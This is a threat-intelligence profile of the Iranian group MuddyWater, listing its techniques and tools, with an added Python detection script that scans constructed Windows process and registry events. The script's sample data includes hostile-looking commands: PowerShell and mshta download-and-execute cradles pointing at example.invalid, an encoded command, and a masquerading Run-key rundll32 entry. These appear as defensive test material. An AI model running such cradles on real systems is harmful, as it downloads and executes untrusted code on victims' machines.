MuddyWater

MuddyWater is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to FIN7, but the group is believed to be a distinct group possibly motivated by espionage.[1][2][3]

ID: G0069
Version: 2.0

Associated Group Descriptions

Name | Description
Seedworm | [2]
TEMP.Zagros | [4]

Techniques Used

Domain | ID | Name | Use
Enterprise | T1088 | Bypass User Account Control | MuddyWater uses various techniques to bypass UAC.[3]
Enterprise | T1191 | CMSTP | MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload.[4]
Enterprise | T1059 | Command-Line Interface | MuddyWater has used a custom tool for creating reverse shells.[2]
Enterprise | T1500 | Compile After Delivery | MuddyWater has used the .NET csc.exe tool to compile executables from downloaded C# code.[3]
Enterprise | T1090 | Connection Proxy | MuddyWater has controlled POWERSTATS from behind a proxy network to obfuscate the C2 location.[2]
Enterprise | T1003 | Credential Dumping | MuddyWater has performed credential dumping with Mimikatz, LaZagne, and other tools, including by dumping passwords saved in victim web browsers and email.[1][2]
Enterprise | T1081 | Credentials in Files | MuddyWater has run a tool that steals passwords saved in victim web browsers and email.[2]
Enterprise | T1002 | Data Compressed | MuddyWater has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.[2]
Enterprise | T1140 | Deobfuscate/Decode Files or Information | MuddyWater decoded base64-encoded PowerShell commands using a VBS file.[4][5][3]
Enterprise | T1175 | Distributed Component Object Model | MuddyWater has used malware that has the capability to execute malware via COM and Outlook.[6]
Enterprise | T1173 | Dynamic Data Exchange | MuddyWater has used malware that can execute PowerShell scripts via DDE.[6]
Enterprise | T1083 | File and Directory Discovery | MuddyWater has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."[6]
Enterprise | T1036 | Masquerading | MuddyWater has used filenames and Registry key names associated with Windows Defender. The group has also stored obfuscated JavaScript code in an image file named temp.jpg.[4][3]
Enterprise | T1170 | Mshta | MuddyWater has used mshta.exe to execute its POWERSTATS payload and to pass a PowerShell one-liner for execution.[4][6]
Enterprise | T1027 | Obfuscated Files or Information | MuddyWater has used Daniel Bohannon's Invoke-Obfuscation framework. The group has also used other obfuscation methods, including Base64 obfuscation of VBScripts and PowerShell commands.[1][7][4][6]
Enterprise | T1086 | PowerShell | MuddyWater has used PowerShell for execution.[4][5][6][2][3]
Enterprise | T1057 | Process Discovery | MuddyWater has used malware to obtain a list of running processes on the system.[6]
Enterprise | T1060 | Registry Run Keys / Startup Folder | MuddyWater has added Registry Run keys to establish persistence.[4][6]
Enterprise | T1105 | Remote File Copy | MuddyWater has used malware that can upload additional files to the victim's machine.[6][3]
Enterprise | T1085 | Rundll32 | MuddyWater has used malware that leveraged rundll32.exe in a Registry Run key to execute a .dll.[6]
Enterprise | T1113 | Screen Capture | MuddyWater has used malware that can capture screenshots of the victim's machine.[6]
Enterprise | T1064 | Scripting | MuddyWater has used VBScript and JavaScript files to execute its POWERSTATS payload. MuddyWater has also used Microsoft scriptlets, macros, and PowerShell scripts.[4][5][6][2][3]
Enterprise | T1063 | Security Software Discovery | MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.[6]
Enterprise | T1193 | Spearphishing Attachment | MuddyWater has compromised third parties and used the compromised accounts to send spearphishing emails with targeted attachments to recipients.[1][4][6]
Enterprise | T1082 | System Information Discovery | MuddyWater has used malware that can collect the victim's OS version and machine name.[6]
Enterprise | T1016 | System Network Configuration Discovery | MuddyWater has used malware to collect the victim's IP address and domain name.[6]
Enterprise | T1033 | System Owner/User Discovery | MuddyWater has used malware that can collect the victim's username.[6]
Enterprise | T1204 | User Execution | MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.[1][4][6]
Enterprise | T1047 | Windows Management Instrumentation | MuddyWater has used malware that leveraged WMI for execution.[6][3]
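Detection logic for the living-off-the-land chain described in the rows above (CMSTP, Mshta, PowerShell, Deobfuscate/Decode, Compile After Delivery, Data Compressed, Registry Run Keys and Rundll32), as an added example in Python that is not MITRE's code and not any MuddyWater tooling: it runs a handful of rules over constructed Sysmon-style process-creation and registry events, decodes a PowerShell -EncodedCommand argument (base64 of UTF-16LE) so the cradle inside can be inspected, and tags each hit with the technique ID from the table. The file paths, the Run key value name, the example.invalid URL and the conditions in each rule are assumptions chosen for the sample, not indicators taken from the cited reports.

```python
"""Rule pass over constructed Sysmon-style events for the MuddyWater
living-off-the-land patterns listed on this page. Sample events are
constructed, not real telemetry; technique IDs follow the table above."""
import base64
import re


def encode_command(script: str) -> str:
    """Build the base64(UTF-16LE) blob PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Hypothetical download cradle, used only to build the sample events below.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"

# Constructed events: "process" mirrors Sysmon EID 1 fields, "registry" mirrors EID 13.
SAMPLE_EVENTS = [
    {"kind": "process", "image": r"C:\Windows\System32\cmstp.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"cmstp.exe /ni /s C:\Users\alice\AppData\Local\Temp\install.inf"},
    {"kind": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'''mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/m'))"",0:close")'''},
    {"kind": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + encode_command(CRADLE)},
    {"kind": "process", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"csc.exe /nologo /out:C:\Users\alice\AppData\Local\Temp\a.exe C:\Users\alice\AppData\Local\Temp\a.cs"},
    {"kind": "process", "image": r"C:\Windows\System32\makecab.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"makecab.exe C:\Users\alice\AppData\Local\Temp\docs.txt C:\Users\alice\AppData\Local\Temp\docs.cab"},
    # Value name imitating Windows Defender, as the Masquerading row describes (constructed).
    {"kind": "registry",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefenderUpdate",
     "data": r"rundll32.exe C:\ProgramData\WindowsDefender\defender.dll,Start"},
    # Benign control: csc.exe driven by MSBuild from a source tree should not fire.
    {"kind": "process", "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "parent": r"C:\Program Files\dotnet\MSBuild.exe",
     "cmdline": r"csc.exe /noconfig @C:\src\app\obj\Release\app.csproj.rsp"},
]

USER_WRITABLE = re.compile(r"(?i)\\(Users|ProgramData|Windows\\Temp)\\")
SCRIPT_HOSTS = re.compile(r"(?i)\\(powershell|pwsh|wscript|cscript|mshta|cmd)\.exe$")
RUN_KEY = re.compile(r"(?i)\\CurrentVersion\\Run(Once)?\\")


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -e/-enc/-EncodedCommand, or None."""
    m = re.search(r"(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(events):
    """Return (event_index, technique_id, note) for every rule an event matches."""
    findings = []
    for i, ev in enumerate(events):
        if ev["kind"] == "registry":
            # Run key whose data launches rundll32: persistence plus the rundll32 proxy.
            if RUN_KEY.search(ev["key"]) and "rundll32" in ev["data"].lower():
                findings.append((i, "T1060", "Run key value set: " + ev["data"]))
                findings.append((i, "T1085", "rundll32.exe used to execute a DLL from a Run key"))
            continue
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd, parent = ev["cmdline"], ev["parent"]
        if image == "cmstp.exe" and re.search(r"(?i)\.inf\b", cmd) and USER_WRITABLE.search(cmd):
            findings.append((i, "T1191", "cmstp.exe loading an INF from a user-writable path"))
        if image == "mshta.exe" and re.search(r"(?i)(vbscript:|javascript:|powershell)", cmd):
            findings.append((i, "T1170", "mshta.exe running inline script / PowerShell one-liner"))
        if image == "powershell.exe":
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                findings.append((i, "T1140", "decoded -EncodedCommand: " + decoded))
                if re.search(r"(?i)(downloadstring|net\.webclient|\biex\b|invoke-expression)", decoded):
                    findings.append((i, "T1086", "PowerShell download cradle"))
        if image == "csc.exe" and USER_WRITABLE.search(cmd) and SCRIPT_HOSTS.search(parent):
            findings.append((i, "T1500", "csc.exe compiling source from a user-writable path under a script host"))
        if image == "makecab.exe" and SCRIPT_HOSTS.search(parent):
            findings.append((i, "T1002", "makecab.exe spawned by a script host (staging for upload)"))
    return findings


if __name__ == "__main__":
    for idx, tid, note in analyze(SAMPLE_EVENTS):
        print(f"event {idx}: {tid} {note}")
```

The benign csc.exe event at the end is there to show the parent-process and user-writable-path conditions doing their job; those two conditions are the ones to tune against your own build, installer and scripting telemetry before deploying rules like these, since every binary in the list is a legitimate Windows component.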

Software

ID | Name | References | Techniques
S0349 | LaZagne | [2] | Credential Dumping, Credentials in Files
S0002 | Mimikatz | [1] | Account Manipulation, Credential Dumping, Credentials in Files, DCShadow, Pass the Hash, Pass the Ticket, Private Keys, Security Support Provider, SID-History Injection
S0223 | POWERSTATS | [1][4][3][2] | Account Discovery, Commonly Used Port, Connection Proxy, Data Encoding, Data from Local System, Deobfuscate/Decode Files or Information, Disabling Security Tools, Distributed Component Object Model, Dynamic Data Exchange, File Deletion, Masquerading, Mshta, Obfuscated Files or Information, PowerShell, Remote File Copy, Scheduled Task, Scheduled Transfer, Screen Capture, Scripting, Security Software Discovery, Standard Cryptographic Protocol, System Information Discovery, System Network Configuration Discovery, Uncommonly Used Port, Windows Management Instrumentation

References